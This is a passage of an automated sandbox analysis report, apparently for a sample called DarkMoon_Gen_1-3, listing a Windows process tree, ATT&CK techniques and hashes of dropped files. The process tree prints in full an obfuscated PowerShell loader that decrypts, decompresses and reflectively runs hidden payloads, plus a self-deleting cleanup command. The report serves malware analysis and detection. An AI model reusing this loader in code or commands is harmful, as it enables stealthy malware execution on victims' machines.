                                                  5⤵
                                                    PID:528
                                                  • C:\Windows\SysWOW64\dllhost.exe
                                                    C:\Windows\SysWOW64\dllhost.exe /Processid:{b5d8c5eb-07af-4839-a3aa-6ae34d5dbaf0}
                                                    5⤵
                                                      PID:5888
                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 5888 -s 460
                                                        6⤵
                                                        • Program crash
                                                        • Checks processor information in registry
                                                        • Enumerates system info in registry
                                                        PID:2956
                                            • C:\Windows\System32\svchost.exe
                                              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                                              1⤵
                                              • Drops file in System32 directory
                                              PID:1232
                                            • C:\Windows\system32\svchost.exe
                                              C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                                              1⤵
                                                PID:1280
                                              • C:\Windows\system32\svchost.exe
                                                C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                                                1⤵
                                                  PID:1300
                                                • C:\Windows\system32\svchost.exe
                                                  C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                                                  1⤵
                                                    PID:1364
                                                  • C:\Windows\system32\svchost.exe
                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                                                    1⤵
                                                      PID:1440
                                                      • C:\Windows\system32\sihost.exe
                                                        sihost.exe
                                                        2⤵
                                                          PID:2656
                                                      • C:\Windows\system32\svchost.exe
                                                        C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                                        1⤵
                                                          PID:1504
                                                        • C:\Windows\system32\svchost.exe
                                                          C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                                                          1⤵
                                                            PID:1508
                                                          • C:\Windows\System32\svchost.exe
                                                            C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                                            1⤵
                                                              PID:1524
                                                            • C:\Windows\system32\svchost.exe
                                                              C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                                              1⤵
                                                                PID:1652
                                                              • C:\Windows\System32\svchost.exe
                                                                C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
                                                                1⤵
                                                                  PID:1696
                                                                • C:\Windows\System32\svchost.exe
                                                                  C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                                                  1⤵
                                                                    PID:1736
                                                                  • C:\Windows\System32\svchost.exe
                                                                    C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
                                                                    1⤵
                                                                      PID:1776
                                                                    • C:\Windows\System32\svchost.exe
                                                                      C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                                      1⤵
                                                                        PID:1816
                                                                      • C:\Windows\system32\svchost.exe
                                                                        C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                                                        1⤵
                                                                          PID:1936
                                                                        • C:\Windows\system32\svchost.exe
                                                                          C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
                                                                          1⤵
                                                                            PID:1960
                                                                          • C:\Windows\System32\svchost.exe
                                                                            C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                                            1⤵
                                                                              PID:1968
                                                                            • C:\Windows\System32\svchost.exe
                                                                              C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                                              1⤵
                                                                                PID:2032
                                                                              • C:\Windows\System32\spoolsv.exe
                                                                                C:\Windows\System32\spoolsv.exe
                                                                                1⤵
                                                                                  PID:1732
                                                                                • C:\Windows\System32\svchost.exe
                                                                                  C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                                                                  1⤵
                                                                                    PID:2196
                                                                                  • C:\Windows\system32\svchost.exe
                                                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                                                    1⤵
                                                                                    • Checks processor information in registry
                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                    PID:2276
                                                                                  • C:\Windows\System32\svchost.exe
                                                                                    C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
                                                                                    1⤵
                                                                                      PID:2284
                                                                                    • C:\Windows\system32\svchost.exe
                                                                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                                                      1⤵
                                                                                        PID:2516
                                                                                      • C:\Windows\system32\svchost.exe
                                                                                        C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
                                                                                        1⤵
                                                                                          PID:2524
                                                                                        • C:\Windows\system32\svchost.exe
                                                                                          C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                                                          1⤵
                                                                                            PID:2700
                                                                                          • C:\Windows\system32\svchost.exe
                                                                                            C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
                                                                                            1⤵
                                                                                            • Drops file in System32 directory
                                                                                            PID:2792
                                                                                          • C:\Windows\system32\svchost.exe
                                                                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                                                            1⤵
                                                                                              PID:2828
                                                                                            • C:\Windows\sysmon.exe
                                                                                              C:\Windows\sysmon.exe
                                                                                              1⤵
                                                                                                PID:2844
                                                                                              • C:\Windows\System32\svchost.exe
                                                                                                C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
                                                                                                1⤵
                                                                                                  PID:2868
                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
                                                                                                  1⤵
                                                                                                    PID:2880
                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
                                                                                                    1⤵
                                                                                                      PID:2964
                                                                                                    • C:\Windows\system32\wbem\unsecapp.exe
                                                                                                      C:\Windows\system32\wbem\unsecapp.exe -Embedding
                                                                                                      1⤵
                                                                                                        PID:3104
                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                        C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
                                                                                                        1⤵
                                                                                                          PID:3500
                                                                                                        • C:\Windows\Explorer.EXE
                                                                                                          C:\Windows\Explorer.EXE
                                                                                                          1⤵
                                                                                                          • Suspicious use of UnmapMainImage
                                                                                                          PID:3508
                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                            C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\DarkMoon_Gen_1-3\lib\uni.bat"
                                                                                                            2⤵
                                                                                                            • Suspicious use of WriteProcessMemory
                                                                                                            PID:1456
                                                                                                            • C:\Windows\System32\Conhost.exe
                                                                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                              3⤵
                                                                                                                PID:216
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\DarkMoon_Gen_1-3\lib\uni.bat.exe
                                                                                                                "uni.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function PCvVf($yFrQM){ $KryQB=[System.Security.Cryptography.Aes]::Create(); $KryQB.Mode=[System.Security.Cryptography.CipherMode]::CBC; $KryQB.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $KryQB.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mWxz9LOIFbVN1/7cN9UWMlncfIJFIhU1cXRWWiP9bXg='); $KryQB.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('EIdWPSRydSjZkTvenqbEOg=='); $TSyON=$KryQB.CreateDecryptor(); $return_var=$TSyON.TransformFinalBlock($yFrQM, 0, $yFrQM.Length); $TSyON.Dispose(); $KryQB.Dispose(); $return_var;}function DJYpo($yFrQM){ $rdKbv=New-Object System.IO.MemoryStream(,$yFrQM); $nDivC=New-Object System.IO.MemoryStream; $KhHzB=New-Object System.IO.Compression.GZipStream($rdKbv, [IO.Compression.CompressionMode]::Decompress); $KhHzB.CopyTo($nDivC); $KhHzB.Dispose(); $rdKbv.Dispose(); $nDivC.Dispose(); $nDivC.ToArray();}function mCQbd($yFrQM,$cFYDO){ $nHpHM=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$yFrQM); $KnSYu=$nHpHM.EntryPoint; $KnSYu.Invoke($null, $cFYDO);}$PdisG=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\DarkMoon_Gen_1-3\lib\uni.bat').Split([Environment]::NewLine);foreach ($gyYDO in $PdisG) { if ($gyYDO.StartsWith('SEROXEN')) { $UdMrg=$gyYDO.Substring(7); break; }}$ekLHX=[string[]]$UdMrg.Split('\');$HlrJz=DJYpo (PCvVf ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ekLHX[0])));$ejeLz=DJYpo (PCvVf ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ekLHX[1])));mCQbd $ejeLz (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));mCQbd $HlrJz (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));
                                                                                                                3⤵
                                                                                                                • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                • Checks computer location settings
                                                                                                                • Executes dropped EXE
                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                • Drops file in Windows directory
                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                                PID:2172
                                                                                                                • C:\Windows\SysWOW64\dllhost.exe
                                                                                                                  C:\Windows\SysWOW64\dllhost.exe /Processid:{2a240cd9-64ce-4120-aab0-cf893ae2095a}
                                                                                                                  4⤵
                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                  PID:1188
                                                                                                                • C:\Windows\SysWOW64\dllhost.exe
                                                                                                                  C:\Windows\SysWOW64\dllhost.exe /Processid:{28162721-f490-4d21-9325-833a5a7a999d}
                                                                                                                  4⤵
                                                                                                                    PID:1372
                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                    "C:\Windows\System32\cmd.exe" /C PING localhost -n 8 >NUL & taskkill /F /IM "C:\Users\Admin\AppData\Local\Temp\DarkMoon_Gen_1-3\lib\uni.bat.exe" & ATTRIB -h -s "C:\Users\Admin\AppData\Local\Temp\DarkMoon_Gen_1-3\lib\uni.bat.exe" & del /f "C:\Users\Admin\AppData\Local\Temp\DarkMoon_Gen_1-3\lib\uni.bat.exe" & exit
                                                                                                                    4⤵
                                                                                                                      PID:3244
                                                                                                                      • C:\Windows\System32\Conhost.exe
                                                                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                        5⤵
                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                        PID:5844
                                                                                                                      • C:\Windows\system32\PING.EXE
                                                                                                                        PING localhost -n 8
                                                                                                                        5⤵
                                                                                                                        • Runs ping.exe
                                                                                                                        PID:5892
                                                                                                                      • C:\Windows\system32\taskkill.exe
                                                                                                                        taskkill /F /IM "C:\Users\Admin\AppData\Local\Temp\DarkMoon_Gen_1-3\lib\uni.bat.exe"
                                                                                                                        5⤵
                                                                                                                        • Kills process with taskkill
                                                                                                                        PID:1252
                                                                                                                      • C:\Windows\system32\attrib.exe
                                                                                                                        ATTRIB -h -s "C:\Users\Admin\AppData\Local\Temp\DarkMoon_Gen_1-3\lib\uni.bat.exe"
                                                                                                                        5⤵
                                                                                                                        • Views/modifies file attributes
                                                                                                                        PID:5616
                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
                                                                                                                1⤵
                                                                                                                  PID:3672
                                                                                                                • C:\Windows\system32\DllHost.exe
                                                                                                                  C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                                  1⤵
                                                                                                                    PID:3864
                                                                                                                  • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                    C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                    1⤵
                                                                                                                      PID:4020
                                                                                                                    • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                      C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                      1⤵
                                                                                                                        PID:2324
                                                                                                                      • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                        C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                        1⤵
                                                                                                                          PID:4452
                                                                                                                        • C:\Windows\system32\svchost.exe
                                                                                                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                                          1⤵
                                                                                                                            PID:4004
                                                                                                                          • C:\Windows\System32\svchost.exe
                                                                                                                            C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                                                                                                            1⤵
                                                                                                                              PID:2900
                                                                                                                            • C:\Windows\system32\svchost.exe
                                                                                                                              C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
                                                                                                                              1⤵
                                                                                                                                PID:4064
                                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                                C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
                                                                                                                                1⤵
                                                                                                                                • Modifies data under HKEY_USERS
                                                                                                                                PID:1716
                                                                                                                              • C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
                                                                                                                                "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
                                                                                                                                1⤵
                                                                                                                                • Drops file in System32 directory
                                                                                                                                • Modifies data under HKEY_USERS
                                                                                                                                PID:1760
                                                                                                                              • C:\Windows\system32\SppExtComObj.exe
                                                                                                                                C:\Windows\system32\SppExtComObj.exe -Embedding
                                                                                                                                1⤵
                                                                                                                                  PID:400
                                                                                                                                • C:\Windows\System32\svchost.exe
                                                                                                                                  C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                                                                                                  1⤵
                                                                                                                                    PID:972
                                                                                                                                  • C:\Windows\system32\DllHost.exe
                                                                                                                                    C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                                                    1⤵
                                                                                                                                    • Drops file in System32 directory
                                                                                                                                    PID:1976
                                                                                                                                  • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                    C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                    1⤵
                                                                                                                                      PID:3952
                                                                                                                                    • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                      C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                      1⤵
                                                                                                                                      • Modifies registry class
                                                                                                                                      PID:1336
                                                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
                                                                                                                                      1⤵
                                                                                                                                        PID:3328
                                                                                                                                      • C:\Windows\system32\wbem\wmiprvse.exe
                                                                                                                                        C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                        1⤵
                                                                                                                                        • Checks BIOS information in registry
                                                                                                                                        • Enumerates system info in registry
                                                                                                                                        PID:2352
                                                                                                                                      • C:\Windows\servicing\TrustedInstaller.exe
                                                                                                                                        C:\Windows\servicing\TrustedInstaller.exe
                                                                                                                                        1⤵
                                                                                                                                          PID:4044
                                                                                                                                        • C:\Windows\system32\svchost.exe
                                                                                                                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
                                                                                                                                          1⤵
                                                                                                                                            PID:3080
                                                                                                                                          • C:\Windows\System32\mousocoreworker.exe
                                                                                                                                            C:\Windows\System32\mousocoreworker.exe -Embedding
                                                                                                                                            1⤵
                                                                                                                                            • Checks processor information in registry
                                                                                                                                            • Enumerates system info in registry
                                                                                                                                            PID:3528
                                                                                                                                          • C:\Windows\System32\svchost.exe
                                                                                                                                            C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                                                                                                            1⤵
                                                                                                                                            • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                                            PID:3484
                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 496 -ip 496
                                                                                                                                              2⤵
                                                                                                                                              • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                              PID:5892
                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 4804 -ip 4804
                                                                                                                                              2⤵
                                                                                                                                              • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                              PID:6100
                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 5888 -ip 5888
                                                                                                                                              2⤵
                                                                                                                                                PID:1312
                                                                                                                                            • C:\Windows\system32\backgroundTaskHost.exe
                                                                                                                                              "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
                                                                                                                                              1⤵
                                                                                                                                                PID:3552
                                                                                                                                              • C:\Windows\system32\backgroundTaskHost.exe
                                                                                                                                                "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
                                                                                                                                                1⤵
                                                                                                                                                  PID:5912
                                                                                                                                                • C:\Windows\system32\BackgroundTransferHost.exe
                                                                                                                                                  "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
                                                                                                                                                  1⤵
                                                                                                                                                    PID:5924
                                                                                                                                                  • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                                    C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                                    1⤵
                                                                                                                                                      PID:5144

                                                                                                                                                    Network

                                                                                                                                                    MITRE ATT&CK Matrix ATT&CK v13

                                                                                                                                                    Defense Evasion

                                                                                                                                                    Hide Artifacts

                                                                                                                                                    1
                                                                                                                                                    T1564

                                                                                                                                                    Hidden Files and Directories

                                                                                                                                                    1
                                                                                                                                                    T1564.001

                                                                                                                                                    Discovery

                                                                                                                                                    Query Registry

                                                                                                                                                    5
                                                                                                                                                    T1012

                                                                                                                                                    System Information Discovery

                                                                                                                                                    5
                                                                                                                                                    T1082

                                                                                                                                                    Remote System Discovery

                                                                                                                                                    1
                                                                                                                                                    T1018

                                                                                                                                                    Replay Monitor

                                                                                                                                                    Loading Replay Monitor...

                                                                                                                                                    Downloads

                                                                                                                                                    • C:\ProgramData\Microsoft\Windows\WER\Temp\WER5714.tmp.csv
                                                                                                                                                      Filesize

                                                                                                                                                      41KB

                                                                                                                                                      MD5

                                                                                                                                                      5b1b7570c4a0394f3bbc340c1bd72336

                                                                                                                                                      SHA1

                                                                                                                                                      d3b40c23189bcb145807ffe632e2277ba8141f89

                                                                                                                                                      SHA256

                                                                                                                                                      c6ff81c061dc96edd4212990561e8ce7135edb3a8840e60af895a9dd2c34d66f

                                                                                                                                                      SHA512

                                                                                                                                                      468235e32054e919e6166d2b4346794e7b67d56b340a080b547c8869a297628bef3d3bb9a2f03b3af1aacd6e81966d5f8b5c7ca0902da1a8e023296299c9470a

                                                                                                                                                    • C:\ProgramData\Microsoft\Windows\WER\Temp\WER5782.tmp.txt
                                                                                                                                                      Filesize

                                                                                                                                                      13KB

                                                                                                                                                      MD5

                                                                                                                                                      6056bf1e4e91472a41e46063976c3f08

                                                                                                                                                      SHA1

                                                                                                                                                      939455f6951d51e4ee08960ec77732c400818e9c

                                                                                                                                                      SHA256

                                                                                                                                                      3dbad24c081b0cfccca27e506320b7e66782a588fe152124f38c9c214f40b944

                                                                                                                                                      SHA512

                                                                                                                                                      d9f5cc8a24302fdf917ea5a999a08602d88b0c6e5d6f486a6fd3fb1d01a83143db20a1871b55043f0d407f730e1ca2897c8d416e67ce47fb01e36a203e917391

                                                                                                                                                    • C:\ProgramData\Microsoft\Windows\WER\Temp\WER57A3.tmp.csv
                                                                                                                                                      Filesize

                                                                                                                                                      41KB

                                                                                                                                                      MD5

                                                                                                                                                      02a81f0955ebccea82f2830bf2714e18

                                                                                                                                                      SHA1

                                                                                                                                                      b0708bd5f103a37cc9211faa8c2265ea1c9b7163

                                                                                                                                                      SHA256

                                                                                                                                                      85cbadbaa6c491bf532f7852253bc094cbff2ff1f114939626630f2fbc4ab944

                                                                                                                                                      SHA512

                                                                                                                                                      a7be02ea8551e250ca07a870e9c04a69f993057e4142fc3472cc961072427cbd55b4fa60553ba5ec0045f5e9ab44181267caae3b8059e3b77021309367afe28b

                                                                                                                                                    • C:\ProgramData\Microsoft\Windows\WER\Temp\WER57C3.tmp.txt
                                                                                                                                                      Filesize

                                                                                                                                                      13KB

                                                                                                                                                      MD5

                                                                                                                                                      7fd4311001560070f31c336e56c4f516

                                                                                                                                                      SHA1

                                                                                                                                                      08e1e9b4ce817537737301e621ff893882867ad0

                                                                                                                                                      SHA256

                                                                                                                                                      2b7316c2982571613808913605b4ee814231a471d0cf07a104d8f25336f86edb

                                                                                                                                                      SHA512

                                                                                                                                                      5dea86e00084dd127cbe30a0d510f0b34955a6598f20b1c330e708abd473b994a7ecd34a46ae9bd035ca5f711d26b5066c2085e2087646ae47786339980bec34

                                                                                                                                                    • C:\ProgramData\Microsoft\Windows\WER\Temp\WER593B.tmp.csv
                                                                                                                                                      Filesize

                                                                                                                                                      40KB

                                                                                                                                                      MD5

                                                                                                                                                      c39fb6230cd3a7953e8e88c9e1755d46

                                                                                                                                                      SHA1

                                                                                                                                                      6ea8630f3eb911d39eee8c95cd1b25814c0edb5c

                                                                                                                                                      SHA256

                                                                                                                                                      77b173c2480f2f502728f8a84f5937f318fdbbc815bc4bc7abd108fff9724523

                                                                                                                                                      SHA512

                                                                                                                                                      1217270dd3668f009201c541705cc1d0922a0c65b8a6ba6b3d7ae9781867dd36dbcf3f1fd6e0a0219e05aab244a8721f5a43bc93d3d7e810193f95c49695826a

                                                                                                                                                    • C:\ProgramData\Microsoft\Windows\WER\Temp\WER595B.tmp.txt
                                                                                                                                                      Filesize

                                                                                                                                                      13KB

                                                                                                                                                      MD5

                                                                                                                                                      71c82da2e74b7d29c50c3b1f1e5904b0

                                                                                                                                                      SHA1

                                                                                                                                                      0b39635b615a49a7fdad0ba6cd8d9b25958235cf

                                                                                                                                                      SHA256

                                                                                                                                                      ac504b848c168dff2b4c04d4ff252d278f0e4fa1f07659af121f770bbe186e9b

                                                                                                                                                      SHA512

                                                                                                                                                      9f8f8efcaacb444d097109c1da472fe098d56ba3b8d0d2b3914c6470c6e633de0ca60651ef353e9159bd97a543ac39fde2309fefc480edc67c87d9cb1da40cff

                                                                                                                                                    • C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749
                                                                                                                                                      Filesize

                                                                                                                                                      330B

                                                                                                                                                      MD5

                                                                                                                                                      716a8f251ff66ed817c61ce50f93d70d

                                                                                                                                                      SHA1

                                                                                                                                                      bd3a0739e6632c766b3a13d3b99513b255ac96a2

                                                                                                                                                      SHA256

                                                                                                                                                      114e2f6cdf52bdfb6f976b6a48c25322af0327acba5b1e054b2a6830e0f24a71

                                                                                                                                                      SHA512

                                                                                                                                                      dfacb010683f277dc32cd1e8c50e9c1e9531aef38b21f95e66070d6dbd2f20c30da893daad413c34e7fea86c397930a77d8b9618c700b1a87cc71d1de473d4dc

                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\DarkMoon_Gen_1-3\lib\uni.bat.exe
                                                                                                                                                      Filesize

                                                                                                                                                      442KB

                                                                                                                                                      MD5

                                                                                                                                                      04029e121a0cfa5991749937dd22a1d9

                                                                                                                                                      SHA1

                                                                                                                                                      f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

                                                                                                                                                      SHA256

                                                                                                                                                      9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

                                                                                                                                                      SHA512

                                                                                                                                                      6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_44gopvno.t2s.ps1
                                                                                                                                                      Filesize

                                                                                                                                                      60B

                                                                                                                                                      MD5

                                                                                                                                                      d17fe0a3f47be24a6453e9ef58c94641

                                                                                                                                                      SHA1

                                                                                                                                                      6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                                                                      SHA256

                                                                                                                                                      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                                                                      SHA512

                                                                                                                                                      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                                                                    • C:\Windows\$sxr-cmd.exe
                                                                                                                                                      Filesize

                                                                                                                                                      283KB

                                                                                                                                                      MD5

                                                                                                                                                      8a2122e8162dbef04694b9c3e0b6cdee

                                                                                                                                                      SHA1

                                                                                                                                                      f1efb0fddc156e4c61c5f78a54700e4e7984d55d

                                                                                                                                                      SHA256

                                                                                                                                                      b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450

                                                                                                                                                      SHA512

                                                                                                                                                      99e784141193275d4364ba1b8762b07cc150ca3cb7e9aa1d4386ba1fa87e073d0500e61572f8d1b071f2faa2a51bb123e12d9d07054b59a1a2fd768ad9f24397

                                                                                                                                                    • C:\Windows\$sxr-mshta.exe
                                                                                                                                                      Filesize

                                                                                                                                                      14KB

                                                                                                                                                      MD5

                                                                                                                                                      0b4340ed812dc82ce636c00fa5c9bef2

                                                                                                                                                      SHA1

                                                                                                                                                      51c97ebe601ef079b16bcd87af827b0be5283d96

                                                                                                                                                      SHA256

                                                                                                                                                      dba3137811c686fd35e418d76184070e031f207002649da95385dfd05a8bb895

                                                                                                                                                      SHA512

                                                                                                                                                      d9df8c1f093ea0f7bde9c356349b2ba43e3ca04b4c87c0f33ab89dda5afe9966313a09b60720aa22a1a25d43d7c71a060af93fb8f6488201a0e301c83fa18045

                                                                                                                                                    • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work
                                                                                                                                                      Filesize

                                                                                                                                                      2KB

                                                                                                                                                      MD5

                                                                                                                                                      8abf2d6067c6f3191a015f84aa9b6efe

                                                                                                                                                      SHA1

                                                                                                                                                      98f2b0a5cdb13cd3d82dc17bd43741bf0b3496f7

                                                                                                                                                      SHA256

                                                                                                                                                      ee18bd3259f220c41062abcbe71a421da3e910df11b9f86308a16cdc3a66fbea

                                                                                                                                                      SHA512

                                                                                                                                                      c2d686a6373efcff583c1ef50c144c59addb8b9c4857ccd8565cd8be3c94b0ac0273945167eb04ebd40dfb0351e4b66cffe4c4e478fb7733714630a11f765b63

                                                                                                                                                    • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work
                                                                                                                                                      Filesize

                                                                                                                                                      2KB

                                                                                                                                                      MD5

                                                                                                                                                      f313c5b4f95605026428425586317353

                                                                                                                                                      SHA1

                                                                                                                                                      06be66fa06e1cffc54459c38d3d258f46669d01a

                                                                                                                                                      SHA256

                                                                                                                                                      129d0b993cd3858af5b7e87fdf74d8e59e6f2110184b5c905df8f5f6f2c39d8b

                                                                                                                                                      SHA512

                                                                                                                                                      b87a829c86eff1d10e1590b18a9909f05101a535e5f4cef914a4192956eb35a8bfef614c9f95d53783d77571687f3eb3c4e8ee2f24d23ad24e0976d8266b8890

                                                                                                                                                    • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work
                                                                                                                                                      Filesize

                                                                                                                                                      2KB

                                                                                                                                                      MD5

                                                                                                                                                      ceb7caa4e9c4b8d760dbf7e9e5ca44c5

                                                                                                                                                      SHA1

                                                                                                                                                      a3879621f9493414d497ea6d70fbf17e283d5c08

                                                                                                                                                      SHA256

                                                                                                                                                      98c054088df4957e8d6361fd2539c219bcf35f8a524aad8f5d1a95f218e990e9

                                                                                                                                                      SHA512

                                                                                                                                                      1eddfbf4cb62d3c5b4755a371316304aaeabb00f01bad03fb4f925a98a2f0824f613537d86deddd648a74d694dc13ed5183e761fdc1ec92589f6fa28beb7fbff

                                                                                                                                                    • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work
                                                                                                                                                      Filesize

                                                                                                                                                      2KB

                                                                                                                                                      MD5

                                                                                                                                                      7d612892b20e70250dbd00d0cdd4f09b

                                                                                                                                                      SHA1

                                                                                                                                                      63251cfa4e5d6cbf6fb14f6d8a7407dbe763d3f5

                                                                                                                                                      SHA256

                                                                                                                                                      727c9e7b91e144e453d5b32e18f12508ee84dabe71bc852941d9c9b4923f9e02

                                                                                                                                                      SHA512

                                                                                                                                                      f8d481f3300947d49ce5ab988a9d4e3154746afccc97081cbed1135ffb24fc107203d485dda2d5d714e74e752c614d8cfd16781ea93450fe782ffae3f77066d1

